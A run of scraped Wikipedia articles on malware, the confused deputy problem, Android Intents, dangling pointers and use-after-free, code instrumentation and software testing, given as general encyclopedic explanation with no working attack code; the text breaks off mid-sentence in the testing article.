Malware(aportmanteauofmalicious software)[1]is anysoftwareintentionally designed to cause disruption to acomputer,server,client, orcomputer network, leak private information, gain unauthorized access to information or systems, deprive access to information, or which unknowingly interferes with the user'scomputer securityandprivacy.[1][2][3][4][5]Researchers tend to classify malware into one or more sub-types (i.e.computer viruses,worms,Trojan horses,logic bombs,ransomware,spyware,adware,rogue software,wipersandkeyloggers).[1] Malware poses serious problems to individuals and businesses on the Internet.[6][7]According toSymantec's 2018 Internet Security Threat Report (ISTR), malware variants number has increased to 669,947,865 in 2017, which is twice as many malware variants as in 2016.[8]Cybercrime, which includes malware attacks as well as other crimes committed by computer, was predicted to cost the world economy US$6 trillion in 2021, and is increasing at a rate of 15% per year.[9]Since 2021, malware has been designed to target computer systems that run critical infrastructure such as theelectricity distribution network.[10] The defense strategies against malware differ according to the type of malware but most can be thwarted by installingantivirus software,firewalls, applying regularpatches,securing networksfrom intrusion, having regularbackupsandisolating infected systems. Malware can be designed to evade antivirus software detection algorithms.[8] The notion of a self-reproducing computer program can be traced back to initial theories about the operation of complex automata.[11]John von Neumannshowed that in theory a program could reproduce itself. This constituted a plausibility result incomputability theory.Fred Cohenexperimented with computer viruses and confirmed Neumann's postulate and investigated other properties of malware such as detectability and self-obfuscation using rudimentary encryption. His 1987 doctoral dissertation was on the subject of computer viruses.[12]The combination of cryptographic technology as part of the payload of the virus, exploiting it for attack purposes was initialized and investigated from the mid-1990s, and includes initial ransomware and evasion ideas.[13] BeforeInternetaccess became widespread, viruses spread on personal computers by infecting executable programs orboot sectorsof floppy disks. By inserting a copy of itself into themachine codeinstructions in these programs orboot sectors, a virus causes itself to be run whenever the program is run or the disk is booted. Early computer viruses were written for theApple IIandMac, but they became more widespread with the dominance of theIBM PCandMS-DOS. The first IBM PC virus in the wild was aboot sectorvirus dubbed(c)Brain, created in 1986 by the Farooq Alvi brothers in Pakistan.[14]Malware distributors would trick the user into booting or running from an infected device or medium. For example, a virus could make an infected computer add autorunnable code to any USB stick plugged into it. Anyone who then attached the stick to another computer set to autorun from USB would in turn become infected, and also pass on the infection in the same way.[15] Older email software would automatically openHTML emailcontaining potentially maliciousJavaScriptcode. Users may also execute disguised malicious email attachments. The2018 Data Breach Investigations ReportbyVerizon, cited byCSO Online, states that emails are the primary method of malware delivery, accounting for 96% of malware delivery around the world.[16][17] The first worms,network-borne infectious programs, originated not on personal computers, but on multitaskingUnixsystems. The first well-known worm was theMorris wormof 1988, which infectedSunOSandVAXBSDsystems. Unlike a virus, this worm did not insert itself into other programs. Instead, it exploited security holes (vulnerabilities) in networkserverprograms and started itself running as a separateprocess.[18]This same behavior is used by today's worms as well.[19] With the rise of theMicrosoft Windowsplatform in the 1990s, and the flexiblemacrosof its applications, it became possible to write infectious code in the macro language ofMicrosoft Wordand similar programs. Thesemacro virusesinfect documents and templates rather than applications (executables), but rely on the fact that macros in a Word document are a form ofexecutablecode.[20] Many early infectious programs, including theMorris Worm, the first internet worm, were written as experiments or pranks.[21]Today, malware is used by bothblack hat hackersand governments to steal personal, financial, or business information.[22][23]Today, any device that plugs into a USB port – even lights, fans, speakers, toys, or peripherals such as a digital microscope – can be used to spread malware. Devices can be infected during manufacturing or supply if quality control is inadequate.[15] Since the rise of widespreadbroadbandInternetaccess, malicious software has more frequently been designed for profit. Since 2003, the majority of widespreadvirusesand worms have been designed to take control of users' computers for illicit purposes.[24]Infected "zombie computers" can be used to sendemail spam, to host contraband data such aschild pornography,[25]or to engage indistributed denial-of-serviceattacksas a form ofextortion.[26]Malware is used broadly against government or corporate websites to gather sensitive information,[27]or to disrupt their operation in general. Further, malware can be used against individuals to gain information such as personal identification numbers or details, bank or credit card numbers, and passwords.[28][29] In addition to criminal money-making, malware can be used for sabotage, often for political motives.Stuxnet, for example, was designed to disrupt very specific industrial equipment. There have been politically motivated attacks which spread over and shut down large computer networks, including massive deletion of files and corruption ofmaster boot records, described as "computer killing." Such attacks were made on Sony Pictures Entertainment (25 November 2014, using malware known asShamoonor W32.Disttrack) and Saudi Aramco (August 2012).[30][31] Malware can be classified in numerous ways, and certain malicious programs may fall into two or more categories simultaneously.[1]Broadly, software can categorised into three types:[32](i) goodware; (ii) grayware and (iii) malware. A computer virus is software usually hidden within another seemingly harmless program that can produce copies of itself and insert them into other programs or files, and that usually performs a harmful action (such as destroying data).[33]They have been likened tobiological viruses.[3]An example of this is a portable execution infection, a technique, usually used to spread malware, that inserts extra data orexecutable codeintoPE files.[34]A computer virus is software that embeds itself in some otherexecutablesoftware (including the operating system itself) on the target system without the user's knowledge and consent and when it is run, the virus is spread to other executable files. Awormis a stand-alone malware software thatactivelytransmits itself over anetworkto infect other computers and can copy itself without infecting files. These definitions lead to the observation that a virus requires the user to run an infected software or operating system for the virus to spread, whereas a worm spreads itself.[35] Once malicious software is installed on a system, it is essential that it stays concealed, to avoid detection. Software packages known asrootkitsallow this concealment, by modifying the host's operating system so that the malware is hidden from the user. Rootkits can prevent a harmfulprocessfrom being visible in the system's list ofprocesses, or keep its files from being read.[36] Some types of harmful software contain routines to evade identification and/or removal attempts, not merely to hide themselves. An early example of this behavior is recorded in theJargon Filetale of a pair of programs infesting a XeroxCP-Vtime sharing system: Each ghost-job would detect the fact that the other had been killed, and would start a new copy of the recently stopped program within a few milliseconds. The only way to kill both ghosts was to kill them simultaneously (very difficult) or to deliberately crash the system.[37] Abackdooris a broad term for a computer program that allows an attacker persistent unauthorised remote access to a victim's machine often without their knowledge.[38]The attacker typically uses another attack (such as atrojan,wormorvirus) to bypass authentication mechanisms usually over an unsecured network such as the Internet to install the backdoor application. A backdoor can also be a side effect of asoftware bugin legitimate software that is exploited by an attacker to gain access to a victim's computer or network. The idea has often been suggested that computer manufacturers preinstall backdoors on their systems to provide technical support for customers, but this has never been reliably verified. It was reported in 2014 that US government agencies had been diverting computers purchased by those considered "targets" to secret workshops where software or hardware permitting remote access by the agency was installed, considered to be among the most productive operations to obtain access to networks around the world.[39]Backdoors may be installed by Trojan horses,worms,implants, or other methods.[40][41] A Trojan horse misrepresents itself to masquerade as a regular, benign program or utility in order to persuade a victim to install it. A Trojan horse usually carries a hidden destructive function that is activated when the application is started. The term is derived from theAncient Greekstory of theTrojan horseused to invade the city ofTroyby stealth.[42][43] Trojan horses are generally spread by some form ofsocial engineering, for example, where a user is duped into executing an email attachment disguised to be unsuspicious, (e.g., a routine form to be filled in), or bydrive-by download. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller (phoning home) which can then have unauthorized access to the affected computer, potentially installing additional software such as a keylogger to steal confidential information, cryptomining software or adware to generate revenue to the operator of the trojan.[44]While Trojan horses and backdoors are not easily detectable by themselves, computers may appear to run slower, emit more heat or fan noise due to heavy processor or network usage, as may occur when cryptomining software is installed. Cryptominers may limit resource usage and/or only run during idle times in an attempt to evade detection. Unlike computer viruses and worms, Trojan horses generally do not attempt to inject themselves into other files or otherwise propagate themselves.[45] In spring 2017, Mac users were hit by the new version of Proton Remote Access Trojan (RAT)[46]trained to extract password data from various sources, such as browser auto-fill data, the Mac-OS keychain, and password vaults.[47] Droppersare a sub-type of Trojans that solely aim to deliver malware upon the system that they infect with the desire to subvert detection through stealth and a light payload.[48]It is important not to confuse a dropper with a loader or stager. A loader or stager will merely load an extension of the malware (for example a collection of malicious functions through reflective dynamic link library injection) into memory. The purpose is to keep the initial stage light and undetectable. A dropper merely downloads further malware to the system. Ransomware prevents a user from accessing their files until a ransom is paid. There are two variations of ransomware, being crypto ransomware and locker ransomware.[49]Locker ransomware just locks down a computer system without encrypting its contents, whereas crypto ransomware locks down a system and encrypts its contents. For example, programs such asCryptoLockerencryptfiles securely, and only decrypt them on payment of a substantial sum of money.[50] Lock-screens, or screen lockers is a type of "cyber police" ransomware that blocks screens on Windows or Android devices with a false accusation in harvesting illegal content, trying to scare the victims into paying up a fee.[51]Jisut and SLocker impact Android devices more than other lock-screens, with Jisut making up nearly 60 percent of all Android ransomware detections.[52] Encryption-based ransomware, like the name suggests, is a type of ransomware that encrypts all files on an infected machine. These types of malware then display a pop-up informing the user that their files have been encrypted and that they must pay (usually in Bitcoin) to recover them. Some examples of encryption-based ransomware areCryptoLockerandWannaCry.[53] Some malware is used to generate money byclick fraud, making it appear that the computer user has clicked an advertising link on a site, generating a payment from the advertiser. It was estimated in 2012 that about 60 to 70% of all active malware used some kind of click fraud, and 22% of all ad-clicks were fraudulent.[54] Grayware is any unwanted application or file that can worsen the performance of computers and may cause security risks but which there is insufficient consensus or data to classify them as malware.[32]Types of grayware typically includespyware,adware,fraudulent dialers, joke programs ("jokeware") andremote access tools.[38]For example, at one point,Sony BMGcompact discssilently installed a rootkiton purchasers' computers with the intention of preventing illicit copying.[55] Potentially unwanted programs(PUPs) are applications that would be considered unwanted despite often being intentionally downloaded by the user.[56]PUPs include spyware, adware, and fraudulent dialers. Many security products classify unauthorisedkey generatorsas PUPs, although they frequently carry true malware in addition to their ostensible purpose.[57]In fact, Kammerstetter et al. (2012)[57]estimated that as much as 55% of key generators could contain malware and that about 36% malicious key generators were not detected by antivirus software. Some types of adware turn off anti-malware and virus protection; technical remedies are available.[58] Programs designed to monitor users' web browsing, displayunsolicited advertisements, or redirectaffiliate marketingrevenues are calledspyware. Spyware programs do not spread like viruses; instead they are generally installed by exploiting security holes. They can also be hidden and packaged together with unrelated user-installed software.[59]TheSony BMG rootkitwas intended to prevent illicit copying; but also reported on users' listening habits, and unintentionally created extra security vulnerabilities.[55] Antivirus software typically uses two techniques to detect malware: (i) static analysis and (ii) dynamic/heuristic analysis.[60]Static analysis involves studying the software code of a potentially malicious program and producing a signature of that program. This information is then used to compare scanned files by an antivirus program. Because this approach is not useful for malware that has not yet been studied, antivirus software can use dynamic analysis to monitor how the program runs on a computer and block it if it performs unexpected activity. The aim of any malware is to conceal itself from detection by users or antivirus software.[1]Detecting potential malware is difficult for two reasons. The first is that it is difficult to determine if software is malicious.[32]The second is that malware uses technical measures to make it more difficult to detect it.[60]An estimated 33% of malware is not detected by antivirus software.[57] The most commonly employed anti-detection technique involves encrypting the malware payload in order to prevent antivirus software from recognizing the signature.[32]Tools such as crypters come with an encrypted blob of malicious code and a decryption stub. The stub decrypts the blob and loads it into memory. Because antivirus does not typically scan memory and only scans files on the drive, this allows the malware to evade detection. Advanced malware has the ability to transform itself into different variations, making it less likely to be detected due to the differences in its signatures. This is known as polymorphic malware. Other common techniques used to evade detection include, from common to uncommon:[61](1) evasion of analysis and detection byfingerprintingthe environment when executed;[62](2) confusing automated tools' detection methods. This allows malware to avoid detection by technologies such as signature-based antivirus software by changing the server used by the malware;[61](3) timing-based evasion. This is when malware runs at certain times or following certain actions taken by the user, so it executes during certain vulnerable periods, such as during the boot process, while remaining dormant the rest of the time; (4)obfuscatinginternal data so that automated tools do not detect the malware;[63](v) information hiding techniques, namelystegomalware;[64]and (5) fileless malware which runs within memory instead of using files and utilizes existing system tools to carry out malicious acts. The use of existing binaries to carry out malicious activities is a technique known as LotL, or Living off the Land.[65]This reduces the amount of forensic artifacts available to analyze. Recently these types of attacks have become more frequent with a 432% increase in 2017 and makeup 35% of the attacks in 2018. Such attacks are not easy to perform but are becoming more prevalent with the help of exploit-kits.[66][67] Avulnerabilityis a weakness,flawor software bug in anapplication, a complete computer, anoperating system, or acomputer networkthat is exploited by malware to bypass defences orgain privilegesit requires to run. For example,TestDisk 6.4or earlier contained a vulnerability that allowed attackers to inject code into Windows.[68]Malware can exploit security defects (security bugsorvulnerabilities) in the operating system, applications (such as browsers, e.g. older versions of Microsoft Internet Explorer supported by Windows XP[69]), or in vulnerable versions of browser plugins such asAdobe Flash Player,Adobe Acrobat or Reader, orJava SE.[70][71]For example, a common method is exploitation of abuffer overrunvulnerability, where software designed to store data in a specified region of memory does not prevent more data than the buffer can accommodate from being supplied. Malware may provide data that overflows the buffer, with maliciousexecutablecode or data after the end; when this payload is accessed it does what the attacker, not the legitimate software, determines. Malware can exploit recently discovered vulnerabilities before developers have had time to release a suitablepatch.[6]Even when new patches addressing the vulnerability have been released, they may not necessarily be installed immediately, allowing malware to take advantage of systems lacking patches. Sometimes even applying patches or installing new versions does not automatically uninstall the old versions. There are several ways the users can stay informed and protected from security vulnerabilities in software. Software providers often announce updates that address security issues.[72]Common vulnerabilitiesare assigned unique identifiers (CVE IDs) and listed in public databases like theNational Vulnerability Database. Tools like Secunia PSI,[73]free for personal use, can scan a computer for outdated software with known vulnerabilities and attempt to update them.Firewallsandintrusion prevention systemscan monitor the network traffic for suspicious activity that might indicate an attack.[74] Users and programs can be assigned moreprivilegesthan they require, and malware can take advantage of this. For example, of 940 Android apps sampled, one third of them asked for more privileges than they required.[75]Apps targeting theAndroidplatform can be a major source of malware infection but one solution is to use third-party software to detect apps that have been assigned excessive privileges.[76] Some systems allow all users to make changes to the core components or settings of the system, which is consideredover-privilegedaccess today. This was the standard operating procedure for early microcomputer and home computer systems, where there was no distinction between anadministratororroot, and a regular user of the system. In some systems,non-administratorusers are over-privileged by design, in the sense that they are allowed to modify internal structures of the system. In some environments, users are over-privileged because they have been inappropriately granted administrator or equivalent status.[77]This can be because users tend to demand more privileges than they need, so often end up being assigned unnecessary privileges.[78] Some systems allow code executed by a user to access all rights of that user, which is known as over-privileged code. This was also standard operating procedure for early microcomputer and home computer systems. Malware, running as over-privileged code, can use this privilege to subvert the system. Almost all currently popular operating systems, and also manyscripting applicationsallow code too many privileges, usually in the sense that when a userexecutescode, the system allows that code all rights of that user.[citation needed] A credential attack occurs when a user account with administrative privileges is cracked and that account is used to provide malware with appropriate privileges.[79]Typically, the attack succeeds because the weakest form of account security is used, which is typically a short password that can be cracked using adictionaryorbrute forceattack. Usingstrong passwordsand enablingtwo-factor authenticationcan reduce this risk. With the latter enabled, even if an attacker can crack the password, they cannot use the account without also having the token possessed by the legitimate user of that account. Homogeneity can be a vulnerability. For example, when all computers in anetworkrun the same operating system, upon exploiting one, onewormcan exploit them all:[80]In particular,Microsoft WindowsorMac OS Xhave such a large share of the market that an exploited vulnerability concentrating on either operating system could subvert a large number of systems. It is estimated that approximately 83% of malware infections between January and March 2020 were spread via systems runningWindows 10.[81]This risk is mitigated by segmenting the networks into differentsubnetworksand setting upfirewallsto block traffic between them.[82][83] Anti-malware (sometimes also calledantivirus) programs block and remove some or all types of malware. For example,Microsoft Security Essentials(for Windows XP, Vista, and Windows 7) andWindows Defender(forWindows 8,10and11) provide real-time protection. TheWindows Malicious Software Removal Toolremoves malicious software from the system.[84]Additionally, several capable antivirus software programs are available for free download from the Internet (usually restricted to non-commercial use).[85]Tests found some free programs to be competitive with commercial ones.[85][86][87] Typically, antivirus software can combat malware in the following ways: A specific component of anti-malware software, commonly referred to as an on-access or real-time scanner, hooks deep into the operating system's core orkerneland functions in a manner similar to how certain malware itself would attempt to operate, though with the user's informed permission for protecting the system. Any time the operating system accesses a file, the on-access scanner checks if the file is infected or not. Typically, when an infected file is found, execution is stopped and the file isquarantinedto prevent further damage with the intention to prevent irreversible system damage. Most AVs allow users to override this behaviour. This can have a considerable performance impact on the operating system, though the degree of impact is dependent on how many pages it creates invirtual memory.[91] Sandboxingis asecurity modelthat confines applications within a controlled environment, restricting their operations to authorized "safe" actions and isolating them from other applications on the host. It also limits access to system resources like memory and the file system to maintain isolation.[89] Browser sandboxing is a security measure that isolates web browser processes and tabs from the operating system to prevent malicious code from exploiting vulnerabilities. It helps protect against malware,zero-day exploits, and unintentional data leaks by trapping potentially harmful code within the sandbox. It involves creating separate processes, limiting access to system resources, runningweb contentin isolated processes, monitoring system calls, and memory constraints.Inter-process communication(IPC) is used forsecure communicationbetween processes. Escaping the sandbox involves targeting vulnerabilities in the sandbox mechanism or the operating system's sandboxing features.[90][92] While sandboxing is not foolproof, it significantly reduces theattack surfaceof common threats. Keeping browsers and operating systems updated is crucial to mitigate vulnerabilities.[90][92] Website vulnerability scans check the website, detect malware, may note outdated software, and may report known security issues, in order to reduce the risk of the site being compromised. Structuring a network as a set of smaller networks, and limiting the flow of traffic between them to that known to be legitimate, can hinder the ability of infectious malware to replicate itself across the wider network.Software-defined networkingprovides techniques to implement such controls. As a last resort, computers can be protected from malware, and the risk of infected computers disseminating trusted information can be greatly reduced by imposing an"air gap"(i.e. completely disconnecting them from all other networks) and applying enhanced controls over the entry and exit of software and data from the outside world. However, malware can still cross the air gap in some situations, not least due to the need to introduce software into the air-gapped network and can damage the availability or integrity of assets thereon.Stuxnetis an example of malware that is introduced to the target environment via a USB drive, causing damage to processes supported on the environment without the need to exfiltrate data. AirHopper,[93]BitWhisper,[94]GSMem[95]and Fansmitter[96]are four techniques introduced by researchers that can leak data from air-gapped computers using electromagnetic, thermal and acoustic emissions. Utilizing bibliometric analysis, the study of malware research trends from 2005 to 2015, considering criteria such as impact journals, highly cited articles, research areas, number of publications, keyword frequency, institutions, and authors, revealed an annual growth rate of 34.1%.North Americaled in research output, followed byAsiaandEurope.ChinaandIndiawere identified as emerging contributors.[97]
https://en.wikipedia.org/wiki/Malware
Ininformation security, aconfused deputyis acomputer programthat is tricked by another program (with fewer privileges or less rights) into misusing its authority on the system. It is a specific type ofprivilege escalation.[1]Theconfused deputy problemis often cited as an example of whycapability-based securityis important. Capability systemsprotect against the confused deputy problem, whereasaccess-control list–based systems do not.[2] In the original example of a confused deputy,[3]there was acompilerprogram provided on a commercialtimesharingservice. Users could run the compiler and optionally specify a filename where it would write debugging output, and the compiler would be able to write to that file if the user had permission to write there. The compiler also collected statistics about language feature usage. Those statistics were stored in a file called "(SYSX)STAT", in the directory "SYSX". To make this possible, the compiler program was given permission to write to files in SYSX. But there were other files in SYSX: in particular, the system's billing information was stored in a file "(SYSX)BILL". A user ran the compiler and named "(SYSX)BILL" as the desired debugging output file. This produced a confused deputy problem. The compiler made a request to theoperating systemto open (SYSX)BILL. Even though the user did not have access to that file, the compiler did, so the open succeeded. The compiler wrote the compilation output to the file (here "(SYSX)BILL") as normal, overwriting it, and the billing information was destroyed. In this example, the compiler program is the deputy because it is acting at the request of the user. The program is seen as 'confused' because it was tricked into overwriting the system's billing file. Whenever a program tries to access a file, the operating system needs to know two things: which file the program is asking for, and whether the program has permission to access the file. In the example, the file is designated by its name, “(SYSX)BILL”. The program receives the file name from the user, but does not know whether the user had permission to write the file. When the program opens the file, the system uses the program's permission, not the user's. When the file name was passed from the user to the program, the permission did not go along with it; the permission was increased by the system silently and automatically. It is not essential to the attack that the billing file be designated by a name represented as a string. The essential points are that: Across-site request forgery(CSRF) is an example of a confused deputy attack that uses theweb browserto perform sensitive actions against a web application. A common form of this attack occurs when a web application uses a cookie to authenticate all requests transmitted by a browser. UsingJavaScript, an attacker can force a browser into transmitting authenticatedHTTPrequests. TheSamy computer wormusedcross-site scripting(XSS) to turn the browser's authenticated MySpace session into a confused deputy. Using XSS the worm forced the browser into posting an executable copy of the worm as a MySpace message which was then viewed and executed by friends of the infected user. Clickjackingis an attack where the user acts as the confused deputy. In this attack a user thinks they are harmlessly browsing a website (an attacker-controlled website) but they are in fact tricked into performing sensitive actions on another website.[4] AnFTP bounce attackcan allow an attacker to connect indirectly toTCPportsto which the attacker's machine has no access, using a remoteFTPserver as the confused deputy. Another example relates topersonal firewallsoftware. It can restrict Internet access for specific applications. Some applications circumvent this by starting a browser with instructions to access a specific URL. The browser has authority to open a network connection, even though the application does not. Firewall software can attempt to address this by prompting the user in cases where one program starts another which then accesses the network. However, the user frequently does not have sufficient information to determine whether such an access is legitimate—false positives are common, and there is a substantial risk that even sophisticated users will become habituated to clicking "OK" to these prompts.[5] Not every program that misuses authority is a confused deputy. Sometimes misuse of authority is simply a result of a program error. The confused deputy problem occurs when the designation of an object is passed from one program to another, and the associated permission changes unintentionally, without any explicit action by either party. It is insidious because neither party did anything explicit to change the authority. In some systems it is possible to ask the operating system to open a file using the permissions of another client. This solution has some drawbacks: The simplest way to solve the confused deputy problem is to bundle together the designation of an object and the permission to access that object. This is exactly what acapabilityis.[citation needed] Using capability security in the compiler example, the client would pass to the server a capability to the output file, such as afile descriptor, rather than the name of the file. Since it lacks a capability to the billing file, it cannot designate that file for output. In the cross-site request forgery example, a URL supplied "cross"-site would include its own authority independent of that of the client of the web browser.
https://en.wikipedia.org/wiki/Confused_deputy_problem
AnIntentin theAndroid operating systemis asoftwaremechanism that allowsusersto coordinate the functions of different activities to achieve a task. An Intent is a messaging object[1]which provides a facility for performinglate runtime bindingbetween the code in different applications in the Androiddevelopment environment. Its most significant use is in the launching of activities, where it can be thought of as the glue between activities: Intents provide an inter-application messaging system that encourages collaboration andcomponent reuse.[2] An Intent is basically apassive data structureholding anabstract descriptionof an action to be performed.[3]Android Tablet Application Developmentlikens an Intent to flicking a switch: "Your intent is to turn on the light, and to do so, you perform the action of flipping the switch to the On position."[4] The concept was created as a way to allow developers to easily remix different apps and allow each type oftask(calledactivity) to be handled by the application best suited to it, even if provided by a third party. Although the concept was not new, the Android architecture doesn't requireelevated privilegesto access the components, which makes it anopen platform.[5] Activities in Android are defined as classes that control the life cycle of a task in the user interface. The activities supported by an application are declared in amanifest, so that other applications can read what activities are supported. Intents in one application can start particular activities in a different application, if the latter supports the message type of the Intent.[6] An analysis in 2011 by researchers fromThe University of California at Berkeleyfound that Intents can pose asecurity risk, allowing attackers to read content in messages and to insert malicious messages between applications.[2]
https://en.wikipedia.org/wiki/Intent_(Android)
Dangling pointersandwild pointersincomputer programmingarepointersthat do not point to a valid object of the appropriate type. These are special cases ofmemory safetyviolations. More generally,dangling referencesandwild referencesarereferencesthat do not resolve to a valid destination. Dangling pointers arise duringobject destruction, when an object that is pointed to by a given pointer is deleted or deallocated, without modifying the value of that said pointer, so that the pointer still points to the memory location of the deallocated memory. The system may reallocate the previously freed memory, and if the program thendereferencesthe (now) dangling pointer,unpredictable behaviormay result, as the memory may now contain completely different data. If the program writes to memory referenced by a dangling pointer, a silent corruption of unrelated data may result, leading to subtlebugsthat can be extremely difficult to find. If the memory has been reallocated to another process, then attempting to dereference the dangling pointer can causesegmentation faults(UNIX, Linux) orgeneral protection faults(Windows). If the program has sufficient privileges to allow it to overwrite the bookkeeping data used by the kernel's memory allocator, the corruption can cause system instabilities. Inobject-oriented languageswithgarbage collection, dangling references are prevented by only destroying objects that are unreachable, meaning they do not have any incoming pointers; this is ensured either by tracing orreference counting. However, afinalizermay create new references to an object, requiringobject resurrectionto prevent a dangling reference. Wild pointers, also called uninitialized pointers, arise when a pointer is used prior to initialization to some known state, which is possible in some programming languages. They show the same erratic behavior as dangling pointers, though they are less likely to stay undetected because many compilers will raise a warning at compile time if declared variables are accessed before being initialized.[1] In many languages (e.g., theC programming language) deleting an object from memory explicitly or by destroying thestack frameon return does not alter associated pointers. The pointer still points to the same location in memory even though that location may now be used for other purposes. A straightforward example is shown below: If the operating system is able to detect run-time references tonull pointers, a solution to the above is to assign 0 (null) to dp immediately before the inner block is exited. Another solution would be to somehow guarantee dp is not used again without further initialization. Another frequent source of dangling pointers is a jumbled combination ofmalloc()andfree()library calls: a pointer becomes dangling when the block of memory it points to is freed. As with the previous example one way to avoid this is to make sure to reset the pointer to null after freeing its reference—as demonstrated below. An all too common misstep is returning addresses of a stack-allocated local variable: once a called function returns, the space for these variables gets deallocated and technically they have "garbage values". Attempts to read from the pointer may still return the correct value (1234) for a while after callingfunc, but any functions called thereafter may overwrite the stack storage allocated fornumwith other values and the pointer would no longer work correctly. If a pointer tonummust be returned,nummust have scope beyond the function—it might be declared asstatic. Antoni Kreczmar[pl](1945–1996) has created a complete object management system which is free of dangling reference phenomenon.[2]A similar approach was proposed by Fisher and LeBlanc[3]under the nameLocks-and-keys. Wild pointers are created by omitting necessary initialization prior to first use. Thus, strictly speaking, every pointer in programming languages which do not enforce initialization begins as a wild pointer. This most often occurs due to jumping over the initialization, not by omitting it. Most compilers are able to warn about this. Likebuffer-overflowbugs, dangling/wild pointer bugs frequently become security holes. For example, if the pointer is used to make avirtual functioncall, a different address (possibly pointing at exploit code) may be called due to thevtablepointer being overwritten. Alternatively, if the pointer is used for writing to memory, some other data structure may be corrupted. Even if the memory is only read once the pointer becomes dangling, it can lead to information leaks (if interesting data is put in the next structure allocated there) or toprivilege escalation(if the now-invalid memory is used in security checks). When a dangling pointer is used after it has been freed without allocating a new chunk of memory to it, this becomes known as a "use after free" vulnerability.[4]For example,CVE-2014-1776is a use-after-free vulnerability in Microsoft Internet Explorer 6 through 11[5]being used byzero-day attacksby anadvanced persistent threat.[6] In C, the simplest technique is to implement an alternative version of thefree()(or alike) function which guarantees the reset of the pointer. However, this technique will not clear other pointer variables which may contain a copy of the pointer. The alternative version can be used even to guarantee the validity of an empty pointer before callingmalloc(): These uses can be masked through#definedirectives to construct useful macros (a common one being#define XFREE(ptr) safefree((void **)&(ptr))), creating something like a metalanguage or can be embedded into a tool library apart. In every case, programmers using this technique should use the safe versions in every instance wherefree()would be used; failing in doing so leads again to the problem. Also, this solution is limited to the scope of a single program or project, and should be properly documented. Among more structured solutions, a popular technique to avoid dangling pointers in C++ is to usesmart pointers. A smart pointer typically usesreference countingto reclaim objects. Some other techniques include thetombstonesmethod and thelocks-and-keysmethod.[3] Another approach is to use theBoehm garbage collector, a conservativegarbage collectorthat replaces standard memory allocation functions in C andC++with a garbage collector. This approach completely eliminates dangling pointer errors by disabling frees, and reclaiming objects by garbage collection. Another approach is to use a system such asCHERI, which stores pointers with additional metadata which may prevent invalid accesses by including lifetime information in pointers. CHERI typically requires support in the CPU to conduct these additional checks. In languages like Java, dangling pointers cannot occur because there is no mechanism to explicitly deallocate memory. Rather, the garbage collector may deallocate memory, but only when the object is no longer reachable from any references. In the languageRust, thetype systemhas been extended to include also the variables lifetimes andresource acquisition is initialization. Unless one disables the features of the language, dangling pointers will be caught at compile time and reported as programming errors. To expose dangling pointer errors, one common programming technique is to set pointers to thenull pointeror to an invalid address once the storage they point to has been released. When the null pointer is dereferenced (in most languages) the program will immediately terminate—there is no potential for data corruption or unpredictable behavior. This makes the underlying programming mistake easier to find and resolve. This technique does not help when there are multiple copies of the pointer. Some debuggers will automatically overwrite and destroy data that has been freed, usually with a specific pattern, such as0xDEADBEEF(Microsoft's Visual C/C++ debugger, for example, uses0xCC,0xCDor0xDDdepending on what has been freed[7]). This usually prevents the data from being reused by making it useless and also very prominent (the pattern serves to show the programmer that the memory has already been freed). Tools such asPolyspace,TotalView,Valgrind, Mudflap,[8]AddressSanitizer, or tools based onLLVM[9]can also be used to detect uses of dangling pointers. Other tools (SoftBound,Insure++, andCheckPointer) instrument the source code to collect and track legitimate values for pointers ("metadata") and check each pointer access against the metadata for validity. Another strategy, when suspecting a small set of classes, is to temporarily make all their member functionsvirtual: after the class instance has been destructed/freed, its pointer to theVirtual Method Tableis set toNULL, and any call to a member function will crash the program and it will show the guilty code in the debugger.
https://en.wikipedia.org/wiki/Use-after-free
Compartmentalizationorcompartmentalisationmay refer to:
https://en.wikipedia.org/wiki/Compartmentalization
Incomputer programming,instrumentationis the act of modifying software so thatanalysiscan be performed on it.[1] Generally, instrumentation either modifiessource codeorbinary code. Execution environments like the JVM provide separate interfaces to add instrumentation to program executions, such as theJVMTI, which enables instrumentation during program start. Instrumentation enablesprofiling:[2]measuring dynamic behavior during a test run. This is useful for properties of a program that cannot beanalyzed staticallywith sufficient precision, such asperformanceandalias analysis. Instrumentation can include: Instrumentation is limited by execution coverage. If the program never reaches a particular point of execution, then instrumentation at that point collects no data. For instance, if a word processor application is instrumented, but the user never activates the print feature, then the instrumentation can say nothing about the routines which are used exclusively by the printing feature. Instrumentation increases the execution time of a program. In some contexts, this increase might be dramatic and hence limit the limit the application of instrumentation to debugging contexts. The instrumentation overhead differs depending on the used instrumentation technology.[4] Thiscomputer sciencearticle is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Code_instrumentation
Software testingis the act of checking whethersoftwaresatisfies expectations. Software testing can provide objective, independent information about thequalityof software and theriskof its failure to auseror sponsor.[1] Software testing can determine thecorrectnessof software for specificscenariosbut cannot determine correctness for all scenarios.[2][3]It cannot find allbugs. Based on the criteria for measuring correctness from anoracle, software testing employs principles and mechanisms that might recognize a problem. Examples of oracles includespecifications,contracts,[4]comparable products, past versions of the same product, inferences about intended or expected purpose, user or customer expectations, relevant standards, and applicable laws. Software testing is often dynamic in nature; running the software to verify actual output matches expected. It can also be static in nature; reviewingcodeand its associateddocumentation. Software testing is often used to answer the question: Does the software do what it is supposed to do and what it needs to do? Information learned from software testing may be used to improve the process by which software is developed.[5]: 41–43 Software testing should follow a "pyramid" approach wherein most of your tests should beunit tests, followed byintegration testsand finallyend-to-end (e2e) testsshould have the lowest proportion.[6][7][8] A study conducted byNISTin 2002 reported that software bugs cost the U.S. economy $59.5 billion annually. More than a third of this cost could be avoided if better software testing was performed.[9][dubious–discuss] Outsourcingsoftware testing because of costs is very common, with China, the Philippines, and India being preferred destinations.[citation needed] Glenford J. Myersinitially introduced the separation ofdebuggingfrom testing in 1979.[10]Although his attention was on breakage testing ("A successful test case is one that detects an as-yet undiscovered error."[10]: 16), it illustrated the desire of the software engineering community to separate fundamental development activities, such as debugging, from that of verification. Software testing is typically goal driven. Software testing typically includes handling software bugs – a defect in thecodethat causes an undesirable result.[11]: 31Bugs generally slow testing progress and involveprogrammerassistance todebugand fix. Not all defects cause a failure. For example, a defect indead codewill not be considered a failure. A defect that does not cause failure at one point in time may lead to failure later due to environmental changes. Examples of environment change include running on newcomputer hardware, changes indata, and interacting with different software.[12] A single defect may result in multiple failure symptoms. Software testing may involve a Requirements gap – omission from the design for a requirement.[5]: 426Requirement gaps can often benon-functional requirementssuch astestability,scalability,maintainability,performance, andsecurity. A fundamental limitation of software testing is that testing underallcombinations of inputs and preconditions (initial state) is not feasible, even with a simple product.[3]: 17–18[13]Defects that manifest in unusual conditions are 